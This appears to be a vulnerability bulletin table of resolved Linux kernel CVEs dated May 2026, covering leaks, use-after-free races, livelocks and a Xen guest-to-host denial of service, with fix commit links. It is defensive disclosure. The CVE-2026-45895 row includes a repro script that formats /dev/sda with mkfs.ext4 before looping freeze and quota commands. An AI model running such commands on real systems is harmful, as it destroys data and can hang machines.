| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI/P2PDMA: Release per-CPU pgmap ref when vm_insert_page() fails When vm_insert_page() fails in p2pmem_alloc_mmap(), p2pmem_alloc_mmap() doesn't invoke percpu_ref_put() to free the per-CPU ref of pgmap acquired after gen_pool_alloc_owner(), and memunmap_pages() will hang forever when trying to remove the PCI device. Fix it by adding the missed percpu_ref_put(). | 2026-05-27 | not yet calculated | CVE-2026-45880 | https://git.kernel.org/stable/c/baa42b756d183a59572f3890981a3d32b8d05d40 https://git.kernel.org/stable/c/51b7181cfbedf289ce794b6d97a1c596c309ec38 https://git.kernel.org/stable/c/e19cce88ec4c4877f4ff2469099b9cf23cc3e93e https://git.kernel.org/stable/c/a1f4dc72efc3204db95d052058d785cad7ce755f https://git.kernel.org/stable/c/6220694c52a5a04102b48109e4f24e958b559bd3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: mediatek: svs: Fix memory leak in svs_enable_debug_write() In svs_enable_debug_write(), the buf allocated by memdup_user_nul() is leaked if kstrtoint() fails. Fix this by using __free(kfree) to automatically free buf, eliminating the need for explicit kfree() calls and preventing leaks. [Angelo: Added missing cleanup.h inclusion] | 2026-05-27 | not yet calculated | CVE-2026-45881 | https://git.kernel.org/stable/c/47a3e372f7d68776adb749a27c0ec9058ff1b4fd https://git.kernel.org/stable/c/06195456c4e4de3826c4ca60eca941c472f991d0 https://git.kernel.org/stable/c/a58c97828911c0b6e25d6b556789da974003efda https://git.kernel.org/stable/c/0f6498077faa9cd89bb787bcc57063494a6f0601 https://git.kernel.org/stable/c/6bb10466e0884b4a68d4a1f3f4bb87eeb471c18a https://git.kernel.org/stable/c/6259094ee806fb813ca95894c65fb80e2ec98bf1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: pm8916_bms_vm: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45882 | https://git.kernel.org/stable/c/b69bb88e20c6f8e998dff3e13a316207f49d3fa2 https://git.kernel.org/stable/c/a8b7117ae3a791c6a328674d05a06cd45d8241bd https://git.kernel.org/stable/c/17db6b3abd823c9fba3f3413c4f0f432d99d49dc https://git.kernel.org/stable/c/62914959b35e9a1e29cc0f64cb8cfc5075a5366f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: sca3000: Fix a resource leak in sca3000_probe() spi->irq from request_threaded_irq() is not released when iio_device_register() fails. Add a return value check and jump to a common error handler when iio_device_register() fails. | 2026-05-27 | not yet calculated | CVE-2026-45883 | https://git.kernel.org/stable/c/55e13abf22c27a3b0ab5cf941dd07a2d9786736c https://git.kernel.org/stable/c/40c860ece22542178cddcf01b08644bcdbc597b3 https://git.kernel.org/stable/c/597d749c5180f3e351837e851a6131b140324e9f https://git.kernel.org/stable/c/e8e960c3d23fdb4882d70d34ce762368da0f1427 https://git.kernel.org/stable/c/103ac8e3a7f345a0966ef582b8a874ac31a92c7c https://git.kernel.org/stable/c/517d9f2b963089b3d64c23accf7920d77f5a30c8 https://git.kernel.org/stable/c/84d3c396d8ae73c24dececfcc4e544ea09311e32 https://git.kernel.org/stable/c/62b44ebc1f2c71db3ca2d4737c52e433f6f03038 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: avoid per-cpu hold underflow in aa_get_buffer When aa_get_buffer() pulls from the per-cpu list it unconditionally decrements cache->hold. If hold reaches 0 while count is still non-zero, the unsigned decrement wraps to UINT_MAX. This keeps hold non-zero for a very long time, so aa_put_buffer() never returns buffers to the global list, which can starve other CPUs and force repeated kmalloc(aa_g_path_max) allocations. Guard the decrement so hold never underflows. | 2026-05-27 | not yet calculated | CVE-2026-45884 | https://git.kernel.org/stable/c/202824a1f89a9786c20a3d646a7c88d223abb1b2 https://git.kernel.org/stable/c/80c334acc6d0bee8605a358a33e69b4aea1ffb92 https://git.kernel.org/stable/c/4bcddd0f6b2e52b4c7b520e4d36a115caf5b7169 https://git.kernel.org/stable/c/640cf2f09575c9dc344b3f7be2498d31e3923ead |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: cpcap-battery: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45885 | https://git.kernel.org/stable/c/c549dd3de4b3f6e726d1b8386d40ccf7d3abdbe4 https://git.kernel.org/stable/c/3ff75cba1c98349a23a8f9333981deba1972cc11 https://git.kernel.org/stable/c/2ce2334be155bd8bad6377e99984246ce4dbd08c https://git.kernel.org/stable/c/cbb9b07f88a9ef6518934c41eb3e8cf840d657d5 https://git.kernel.org/stable/c/f3fbe309c9bfe1aac1e2b26543e9dc4829f3275a https://git.kernel.org/stable/c/2841bbb5a35c4449c0a0458e8e476b2a62f95147 https://git.kernel.org/stable/c/e261be6f18929f2397cd54cd583a2df624c129c1 https://git.kernel.org/stable/c/642f33e34b969eedec334738fd5df95d2dc42742 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix bpf_xdp_store_bytes proto for read-only arg While making some maps in Cilium read-only from the BPF side, we noticed that the bpf_xdp_store_bytes proto is incorrect. In particular, the verifier was throwing the following error: ; ret = ctx_store_bytes(ctx, l3_off + offsetof(struct iphdr, saddr), &nat->address, 4, 0); 635: (79) r1 = *(u64 *)(r10 -144) ; R1=ctx() R10=fp0 fp-144=ctx() 636: (b4) w2 = 26 ; R2=26 637: (b4) w4 = 4 ; R4=4 638: (b4) w5 = 0 ; R5=0 639: (85) call bpf_xdp_store_bytes#190 write into map forbidden, value_size=6 off=0 size=4 nat comes from a BPF_F_RDONLY_PROG map, so R3 is a PTR_TO_MAP_VALUE. The verifier checks the helper's memory access to R3 in check_mem_size_reg, as it reaches ARG_CONST_SIZE argument. The third argument has expected type ARG_PTR_TO_UNINIT_MEM, which includes the MEM_WRITE flag. The verifier thus checks for a BPF_WRITE access on R3. Given R3 points to a read-only map, the check fails. Conversely, ARG_PTR_TO_UNINIT_MEM can also lead to the helper reading from uninitialized memory. This patch simply fixes the expected argument type to match that of bpf_skb_store_bytes. | 2026-05-27 | not yet calculated | CVE-2026-45886 | https://git.kernel.org/stable/c/ffb5d1c5e3933b947fc7303ad68bf0c536d0c85e https://git.kernel.org/stable/c/ddc34a1b85505c919026ddc82fafdada9a160b15 https://git.kernel.org/stable/c/0db169a91381a473b7974021d1c02f8da72c5775 https://git.kernel.org/stable/c/d7b87adeb0eb539b9b824b101bb14fb01e41240b https://git.kernel.org/stable/c/57f7f6a0ad04a65c8a7a067b2f56cbbf2aec9e52 https://git.kernel.org/stable/c/6557f1565d779851c4db9c488c49c05a47a6e72f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: af_unix: Fix memleak of newsk in unix_stream_connect(). When prepare_peercred() fails in unix_stream_connect(), unix_release_sock() is not called for newsk, and the memory is leaked. Let's move prepare_peercred() before unix_create1(). | 2026-05-27 | not yet calculated | CVE-2026-45887 | https://git.kernel.org/stable/c/365996a2b14d07caa9e33d367b67ea26c09d89b4 https://git.kernel.org/stable/c/a5d95d7caba0160fb7b2b8d2bd96d5a1be861d9f https://git.kernel.org/stable/c/6884028cd7f275f8bcb854a347265cb1fb0e4bea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid1: fix memory leak in raid1_run() raid1_run() calls setup_conf() which registers a thread via md_register_thread(). If raid1_set_limits() fails, the previously registered thread is not unregistered, resulting in a memory leak of the md_thread structure and the thread resource itself. Add md_unregister_thread() to the error path to properly cleanup the thread, which aligns with the error handling logic of other paths in this function. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45888 | https://git.kernel.org/stable/c/c94fd6e8a71efd047ff36930e840f3c25679e136 https://git.kernel.org/stable/c/ec10e3dc93994b87adf7c759a4639fe34013989a https://git.kernel.org/stable/c/b37588b0282a2b3cdda9db1d53712745ce66dea0 https://git.kernel.org/stable/c/6abc7d5dcf0ee0f85e16e41c87fbd06231f28753 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: do not account for OoO in mptcp_rcvbuf_grow() MPTCP-level OoOs are physiological when multiple subflows are active concurrently and will not cause retransmissions nor are caused by drops. Accounting for them in mptcp_rcvbuf_grow() causes the rcvbuf to slowly drift towards tcp_rmem[2]. Remove such accounting. Note that subflows will still account for TCP-level OoO when the MPTCP-level rcvbuf is propagated. This also closes a subtle and very unlikely race condition with rcvspace init; active sockets with user-space holding the msk-level socket lock could complete such initialization in the receive callback, after the first OoO data reaches the rcvbuf, potentially triggering a divide by zero Oops. | 2026-05-27 | not yet calculated | CVE-2026-45889 | https://git.kernel.org/stable/c/fb7bf00b04a6b48859f52035d4e745848c2b4c79 https://git.kernel.org/stable/c/400ee4854adef1e4983812a3decf6717ea020136 https://git.kernel.org/stable/c/6b329393502e5857662b851a13f947209c588587 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xen-netback: reject zero-queue configuration from guest A malicious or buggy Xen guest can write "0" to the xenbus key "multi-queue-num-queues". The connect() function in the backend only validates the upper bound (requested_num_queues > xenvif_max_queues) but not zero, allowing requested_num_queues=0 to reach vzalloc(array_size(0, sizeof(struct xenvif_queue))), which triggers WARN_ON_ONCE(!size) in __vmalloc_node_range(). On systems with panic_on_warn=1, this allows a guest-to-host denial of service. The Xen network interface specification requires the queue count to be "greater than zero". Add a zero check to match the validation already present in xen-blkback, which has included this guard since its multi-queue support was added. | 2026-05-27 | not yet calculated | CVE-2026-45890 | https://git.kernel.org/stable/c/2993e0f904c45f8af12917344bb1cac7ccd05a60 https://git.kernel.org/stable/c/787bfa423228c4b02ba3368128f625d579085353 https://git.kernel.org/stable/c/ce66d6786de45b7ed9cbbdc0988054bf09e58f54 https://git.kernel.org/stable/c/88b0fced1bbbfdb356a007592604008ffc93a6a1 https://git.kernel.org/stable/c/ec4859ac5c933e3315543a61adc1ca4358006a41 https://git.kernel.org/stable/c/654780dee9eae419e1648ea58462c4efe54518fa https://git.kernel.org/stable/c/d99f69ddc70fd9f4b8148add62209a1a8eb5c615 https://git.kernel.org/stable/c/6d1dc8014334c7fb25719999bca84d811e60a559 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: hns3: fix double free issue for tx spare buffer In hns3_set_ringparam(), a temporary copy (tmp_rings) of the ring structure is created for rollback. However, the tx_spare pointer in the original ring handle is incorrectly left pointing to the old backup memory. Later, if memory allocation fails in hns3_init_all_ring() during the setup, the error path attempts to free all newly allocated rings. Since tx_spare contains a stale (non-NULL) pointer from the backup, it is mistaken for a newly allocated buffer and is erroneously freed, leading to a double-free of the backup memory. The root cause is that the tx_spare field was not cleared after its value was saved in tmp_rings, leaving a dangling pointer. Fix this by setting tx_spare to NULL in the original ring structure when the creation of the new `tx_spare` fails. This ensures the error cleanup path only frees genuinely newly allocated buffers. | 2026-05-27 | not yet calculated | CVE-2026-45891 | https://git.kernel.org/stable/c/fb6a4c376d454b425555b1b0bda36e99f56ec307 https://git.kernel.org/stable/c/43015461662d41dcfb3bb95fadd8a2a42ad8eacf https://git.kernel.org/stable/c/6dc10494cfe27b6f1e9adb7e293293ae39c50b7c https://git.kernel.org/stable/c/d2c785733dfb853ea0b53984c75662a1af230a94 https://git.kernel.org/stable/c/fdbccddb7e7822016601829f95de4008e193f7bc https://git.kernel.org/stable/c/c3659273860bed0c8e573b865e3769abc51225a8 https://git.kernel.org/stable/c/6d2f142b1e4b203387a92519d9d2e34752a79dbb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: drop extent cache after doing PARTIAL_VALID1 zeroout When splitting an unwritten extent in the middle and converting it to initialized in ext4_split_extent() with the EXT4_EXT_MAY_ZEROOUT and EXT4_EXT_DATA_VALID2 flags set, it could leave a stale unwritten extent. Assume we have an unwritten file and a buffered write in the middle of it without dioread_nolock enabled; it will allocate blocks as a written extent. 0 A B N [UUUUUUUUUUUU] on-disk extent U: unwritten extent [UUUUUUUUUUUU] extent status tree [--DDDDDDDD--] D: valid data \|<- ->\| ----> this range needs to be initialized ext4_split_extent() first tries to split this extent at B with the EXT4_EXT_DATA_PARTIAL_VALID1 and EXT4_EXT_MAY_ZEROOUT flags set, but ext4_split_extent_at() fails to split this extent due to a temporary lack of space. It zeroes out B to N and leaves the entire extent as unwritten. 0 A B N [UUUUUUUUUUUU] on-disk extent [UUUUUUUUUUUU] extent status tree [--DDDDDDDDZZ] Z: zeroed data ext4_split_extent() then tries to split this extent at A with the EXT4_EXT_DATA_VALID2 flag set. This time, it splits successfully and leaves a written extent from A to N. 0 A B N [UUWWWWWWWWWW] on-disk extent W: written extent [UUUUUUUUUUUU] extent status tree [--DDDDDDDDZZ] Finally ext4_map_create_blocks() only inserts extent A to B into the extent status tree, and leaves a stale unwritten extent in the status tree. 0 A B N [UUWWWWWWWWWW] on-disk extent W: written extent [UUWWWWWWWWUU] extent status tree [--DDDDDDDDZZ] Fix this issue by always caching the extent status entry after zeroing out the second part. | 2026-05-27 | not yet calculated | CVE-2026-45892 | https://git.kernel.org/stable/c/28db4bfc6f82fd20e2aadb7fc162244109a4eb31 https://git.kernel.org/stable/c/f0931a5c17005a0c4fc35bd1a001245effc3354b https://git.kernel.org/stable/c/d8ee559fccdef713f058cfe5f2c03dc9b18be3b1 https://git.kernel.org/stable/c/c2ee51d684adca7645e4aa74adca13f6750390bc https://git.kernel.org/stable/c/a1b962a821e7a52d48212ae269b45808b4411267 https://git.kernel.org/stable/c/6d882ea3b0931b43530d44149b79fcd4ffc13030 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: Fix & Optimize table creation from possibly unaligned memory Source blob may come from userspace and might be unaligned. Try to optimize the copying process by avoiding unaligned memory accesses. - Added Fixes tag - Added "Fix &" to description as this doesn't just optimize but fixes a potential unaligned memory access [jj: remove duplicate word "convert" in comment triggering checkpatch warning] | 2026-05-27 | not yet calculated | CVE-2026-45893 | https://git.kernel.org/stable/c/47e351dfef60ab0e3285133556e1a9c7f646a969 https://git.kernel.org/stable/c/e027999049c493fb728ead5a90db76942181a935 https://git.kernel.org/stable/c/226c3b10aab23f73b03c47e7773107de56ba3a4e https://git.kernel.org/stable/c/6fc367bfd4c8886e6b1742aabbd1c0bdc310db3a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: quota: fix livelock between quotactl and freeze_super When a filesystem is frozen, quotactl_block() enters a retry loop waiting for the filesystem to thaw. It acquires s_umount, checks the freeze state, drops s_umount and uses the sb_start_write() - sb_end_write() pair to wait for the unfreeze. However, this retry loop can trigger a livelock issue, specifically on kernels with preemption disabled. The mechanism is as follows: 1. freeze_super() sets SB_FREEZE_WRITE and calls sb_wait_write(). 2. sb_wait_write() calls percpu_down_write(), which initiates synchronize_rcu(). 3. Simultaneously, quotactl_block() spins in its retry loop, immediately executing the sb_start_write() - sb_end_write() pair. 4. Because the kernel is non-preemptible and the loop contains no scheduling points, quotactl_block() never yields the CPU. This prevents that CPU from reaching an RCU quiescent state. 5. synchronize_rcu() in the freezer thread waits indefinitely for the quotactl_block() CPU to report a quiescent state. 6. quotactl_block() spins indefinitely waiting for the freezer to advance, which it cannot do as it is blocked on the RCU sync. This results in a hang of the freezer process and 100% CPU usage by the quota process. While this can occur intermittently on multi-core systems, it reproduces reliably on a node with the following script, running both the freezer and the quota toggle on the same CPU: # mkfs.ext4 -O quota /dev/sda 2g && mkdir a_mount # mount /dev/sda -o quota,usrquota,grpquota a_mount # taskset -c 3 bash -c "while true; do xfs_freeze -f a_mount; \ xfs_freeze -u a_mount; done" & # taskset -c 3 bash -c "while true; do quotaon a_mount; \ quotaoff a_mount; done" & Adding cond_resched() to the retry loop fixes the issue. It acts as an RCU quiescent state, allowing synchronize_rcu() in percpu_down_write() to complete. | 2026-05-27 | not yet calculated | CVE-2026-45895 | https://git.kernel.org/stable/c/37ccd48cf35f3c8b9f2ea961a7b486b91eb71a82 https://git.kernel.org/stable/c/414259caf81a397563fc9baca9c0ef856c4a97cf https://git.kernel.org/stable/c/02bb1500f1479750e6557c8044f6a2d7e9d30c12 https://git.kernel.org/stable/c/53b2314b26b6640a3657cc924de63a1a8f26ac4d https://git.kernel.org/stable/c/77449e453dfc006ad738dec55374c4cbc056fd39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: intel-dg: Fix accessing regions before setting nregions The regions array is counted by nregions, but it's set only after accessing it: [] UBSAN: array-index-out-of-bounds in drivers/mtd/devices/mtd_intel_dg.c:750:15 [] index 0 is out of range for type '<unknown> [*]' Fix it by also fixing an undesired behavior: the loop silently ignores ENOMEM and continues setting the other entries. | 2026-05-27 | not yet calculated | CVE-2026-45896 | https://git.kernel.org/stable/c/721bd22bcf45a63ebd9bd0f478ef721b45cc5383 https://git.kernel.org/stable/c/d58fca8513414b15387460b14a7a0a30405b9c9e https://git.kernel.org/stable/c/779c59274d03cc5c07237a2c845dfb71cff77705 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_counter: serialize reset with spinlock Add a global static spinlock to serialize counter fetch+reset operations, preventing concurrent dump-and-reset from underrunning values. The lock is taken before fetching the total so that two parallel resets cannot both read the same counter values and then both subtract them. A global lock is used for simplicity since resets are infrequent. If this becomes a bottleneck, it can be replaced with a per-net lock later. | 2026-05-27 | not yet calculated | CVE-2026-45897 | https://git.kernel.org/stable/c/0cdc6d5a26f2d1f7f15a43526841b679445c32e2 https://git.kernel.org/stable/c/779c60a5190c42689534172f4b49e927c9959e4e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: drop extent cache when splitting extent fails When the split extent fails, we might leave some extents still being processed and return an error directly, which will result in stale extent entries remaining in the extent status tree. So drop all of the remaining potentially stale extents if the splitting fails. | 2026-05-27 | not yet calculated | CVE-2026-45899 | https://git.kernel.org/stable/c/6e54f8dfee359bbd58086c883ea8cffd5312999d https://git.kernel.org/stable/c/337506dc652383c80839edb8d8dcdd8ff2129b4f https://git.kernel.org/stable/c/dc7c9b9d03a59a7fe483574531327e650a4b4adc https://git.kernel.org/stable/c/120c6bd7ca9d3e80a968b758cbb3fbd67570f132 https://git.kernel.org/stable/c/808f3191498f300174523c54cab101e18795ae4e https://git.kernel.org/stable/c/31bf37cf53ede8145e2bc62da803d4506da92975 https://git.kernel.org/stable/c/79b592e8f1b435796cbc2722190368e3e8ffd7a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: caam - fix netdev memory leak in dpaa2_caam_probe When commit 0e1a4d427f58 ("crypto: caam: Unembed net_dev structure in dpaa2") converted embedded net_device to dynamically allocated pointers, it added cleanup in dpaa2_dpseci_disable() but missed adding cleanup in dpaa2_dpseci_free() for error paths. This causes memory leaks when dpaa2_dpseci_dpio_setup() fails during probe due to DPIO devices not being ready yet. The kernel's deferred probe mechanism handles the retry successfully, but the netdevs allocated during the failed probe attempt are never freed, resulting in kmemleak reports showing multiple leaked netdev-related allocations all traced back to dpaa2_caam_probe(). Fix this by preserving the CPU mask of allocated netdevs during setup and using it for cleanup in dpaa2_dpseci_free(). This approach ensures that only the CPUs that actually had netdevs allocated will be cleaned up, avoiding potential issues with CPU hotplug scenarios. | 2026-05-27 | not yet calculated | CVE-2026-45900 | https://git.kernel.org/stable/c/d5c6f254528caf78d5de7d9646dc21c81d351827 https://git.kernel.org/stable/c/d7decb572b55d2af33e59e9858fcee5d9ae69175 https://git.kernel.org/stable/c/e144cce29851610ce9c6eda405ce21118779aa51 https://git.kernel.org/stable/c/7d43252b3060b0ba4a192dce5dba85a3f39ffe39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: revert commit_mutex usage in reset path It causes circular lock dependency between commit_mutex, nfnl_subsys_ipset and nlk_cb_mutex when nft reset, ipset list, and iptables-nft with '-m set' rule run at the same time. Previous patches made it safe to run individual reset handlers concurrently so commit_mutex is no longer required to prevent this. | 2026-05-27 | not yet calculated | CVE-2026-45901 | https://git.kernel.org/stable/c/ee3978b6a0dcd4215cb7cedcba705a12174786a7 https://git.kernel.org/stable/c/7f261bb906bf527c4a6e2a646e2d5f3679f2a8bc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: bq256xx: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45902 | https://git.kernel.org/stable/c/81d3688c9a2158329391e08f2d0b8ba204216044 https://git.kernel.org/stable/c/74b5a88318db97d51bb40f774736553c2acd1514 https://git.kernel.org/stable/c/cb5c743936edcebc51880eeb6bf04979b5c9438b https://git.kernel.org/stable/c/83c27fdd696ac13d023ef7a0345301be93209c53 https://git.kernel.org/stable/c/4b6fb0b6124f558131e502e3ffd03e6583b3ace6 https://git.kernel.org/stable/c/8796910131a32ff29275052df768ef022929a394 https://git.kernel.org/stable/c/8005843369723d9c8975b7c4202d1b85d6125302 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix memory access flags in helper prototypes After commit 37cce22dbd51 ("bpf: verifier: Refactor helper access type tracking"), the verifier started relying on the access type flags in helper function prototypes to perform memory access optimizations. Currently, several helper functions utilizing ARG_PTR_TO_MEM lack the corresponding MEM_RDONLY or MEM_WRITE flags. This omission causes the verifier to incorrectly assume that the buffer contents are unchanged across the helper call. Consequently, the verifier may optimize away subsequent reads based on this wrong assumption, leading to correctness issues. For bpf_get_stack_proto_raw_tp, the original MEM_RDONLY was incorrect since the helper writes to the buffer. Change it to ARG_PTR_TO_UNINIT_MEM which correctly indicates write access to potentially uninitialized memory. Similar issues were recently addressed for specific helpers in commit ac44dcc788b9 ("bpf: Fix verifier assumptions of bpf_d_path's output buffer") and commit 2eb7648558a7 ("bpf: Specify access type of bpf_sysctl_get_name args"). Fix these prototypes by adding the correct memory access flags. | 2026-05-27 | not yet calculated | CVE-2026-45903 | https://git.kernel.org/stable/c/fdfe75161f6e8c41a7d3023fbb815b537107b806 https://git.kernel.org/stable/c/aa319592892068bd960c1a1c07bd621085b0c63d https://git.kernel.org/stable/c/802eef5afb1865bc5536a5302c068ba2215a1f72 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/eeh: fix recursive pci_lock_rescan_remove locking in EEH event handling The recent commit 1010b4c012b0 ("powerpc/eeh: Make EEH driver device hotplug safe") restructured the EEH driver to improve synchronization with the PCI hotplug layer. However, it inadvertently moved pci_lock_rescan_remove() outside its intended scope in eeh_handle_normal_event(), leading to broken PCI error reporting and improper EEH event triggering. Specifically, eeh_handle_normal_event() acquired pci_lock_rescan_remove() before calling eeh_pe_bus_get(), but eeh_pe_bus_get() itself attempts to acquire the same lock internally, causing nested locking and disrupting normal EEH event handling paths. This patch adds a boolean parameter do_lock to _eeh_pe_bus_get(), with two public wrappers: eeh_pe_bus_get() with locking enabled, and eeh_pe_bus_get_nolock() that skips locking. Callers that already hold pci_lock_rescan_remove() now use eeh_pe_bus_get_nolock() to avoid recursive lock acquisition. Additionally, pci_lock_rescan_remove() calls are restored to the correct position, after eeh_pe_bus_get() and immediately before iterating affected PEs and devices. This ensures EEH-triggered PCI removes occur under proper bus rescan locking without recursive lock contention. The eeh_pe_loc_get() function has been split into two functions: eeh_pe_loc_get(struct eeh_pe *pe), which retrieves the location code for the given PE, and eeh_pe_loc_get_bus(struct pci_bus *bus), which retrieves the location code for the given bus. This resolves lockdep warnings such as: <snip> [ 84.964298] [ T928] ============================================ [ 84.964304] [ T928] WARNING: possible recursive locking detected [ 84.964311] [ T928] 6.18.0-rc3 #51 Not tainted [ 84.964315] [ T928] -------------------------------------------- [ 84.964320] [ T928] eehd/928 is trying to acquire lock: [ 84.964324] [ T928] c000000003b29d58 (pci_rescan_remove_lock){+.+.}-{3:3}, at: pci_lock_rescan_remove+0x28/0x40 [ 84.964342] [ T928] but task is already holding lock: [ 84.964347] [ T928] c000000003b29d58 (pci_rescan_remove_lock){+.+.}-{3:3}, at: pci_lock_rescan_remove+0x28/0x40 [ 84.964357] [ T928] other info that might help us debug this: [ 84.964363] [ T928] Possible unsafe locking scenario: [ 84.964367] [ T928] CPU0 [ 84.964370] [ T928] ---- [ 84.964373] [ T928] lock(pci_rescan_remove_lock); [ 84.964378] [ T928] lock(pci_rescan_remove_lock); [ 84.964383] [ T928] *** DEADLOCK *** [ 84.964388] [ T928] May be due to missing lock nesting notation [ 84.964393] [ T928] 1 lock held by eehd/928: [ 84.964397] [ T928] #0: c000000003b29d58 (pci_rescan_remove_lock){+.+.}-{3:3}, at: pci_lock_rescan_remove+0x28/0x40 [ 84.964408] [ T928] stack backtrace: [ 84.964414] [ T928] CPU: 2 UID: 0 PID: 928 Comm: eehd Not tainted 6.18.0-rc3 #51 VOLUNTARY [ 84.964417] [ T928] Hardware name: IBM,9080-HEX POWER10 (architected) 0x800200 0xf000006 of:IBM,FW1060.00 (NH1060_022) hv:phyp pSeries [ 84.964419] [ T928] Call Trace: [ 84.964420] [ T928] [c0000011a7157990] [c000000001705de4] dump_stack_lvl+0xc8/0x130 (unreliable) [ 84.964424] [ T928] [c0000011a71579d0] [c0000000002f66e0] print_deadlock_bug+0x430/0x440 [ 84.964428] [ T928] [c0000011a7157a70] [c0000000002fd0c0] __lock_acquire+0x1530/0x2d80 [ 84.964431] [ T928] [c0000011a7157ba0] [c0000000002fea54] lock_acquire+0x144/0x410 [ 84.964433] [ T928] [c0000011a7157cb0] [c0000011a7157cb0] __mutex_lock+0xf4/0x1050 [ 84.964436] [ T928] [c0000011a7157e00] [c000000000de21d8] pci_lock_rescan_remove+0x28/0x40 [ 84.964439] [ T928] [c0000011a7157e20] [c00000000004ed98] eeh_pe_bus_get+0x48/0xc0 [ 84.964442] [ T928] [c0000011a7157e50] [c00000 ---truncated--- | 2026-05-27 | not yet calculated | CVE-2026-45904 | https://git.kernel.org/stable/c/89810e2d80281d42f855fac813786758ee16e323 https://git.kernel.org/stable/c/788dd28fd49610d6047cbb15dbf1186afffdfbaf https://git.kernel.org/stable/c/f49faa4a64f8ac0e38983e606075b25dfcfc9ad4 https://git.kernel.org/stable/c/87a1f93986aa1500b85aeff16b0b71c29ea116ea https://git.kernel.org/stable/c/f8b16d5764ee1e78c1ef333017ad383ffe76fcdc https://git.kernel.org/stable/c/6e6561231c6cfc32c5631aeecc0928ff2b14265c https://git.kernel.org/stable/c/b85ee287bfe52c6b2d9b41758b5e0d08679d5b39 https://git.kernel.org/stable/c/815a8d2feb5615ae7f0b5befd206af0b0160614c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: fix ip_rt_bug race in icmp_route_lookup reverse path icmp_route_lookup() performs multiple route lookups to find a suitable route for sending ICMP error messages, with special handling for XFRM (IPsec) policies. The lookup sequence is: 1. First, lookup output route for ICMP reply (dst = original src) 2. Pass through xfrm_lookup() for policy check 3. If blocked (-EPERM) or dst is not local, enter "reverse path" 4. In reverse path, call xfrm_decode_session_reverse() to get fl4_dec which reverses the original packet's flow (saddr<->daddr swapped) 5. If fl4_dec.saddr is local (we are the original destination), use __ip_route_output_key() for output route lookup 6. If fl4_dec.saddr is NOT local (we are a forwarding node), use ip_route_input() to simulate the reverse packet's input path 7. Finally, pass rt2 through xfrm_lookup() with XFRM_LOOKUP_ICMP flag The bug occurs in step 6: ip_route_input() is called with fl4_dec.daddr (original packet's source) as destination. If this address becomes local between the initial check and ip_route_input() call (e.g., due to concurrent "ip addr add"), ip_route_input() returns a LOCAL route with dst.output set to ip_rt_bug. This route is then used for ICMP output, causing dst_output() to call ip_rt_bug(), triggering a WARN_ON: ------------[ cut here ]------------ WARNING: 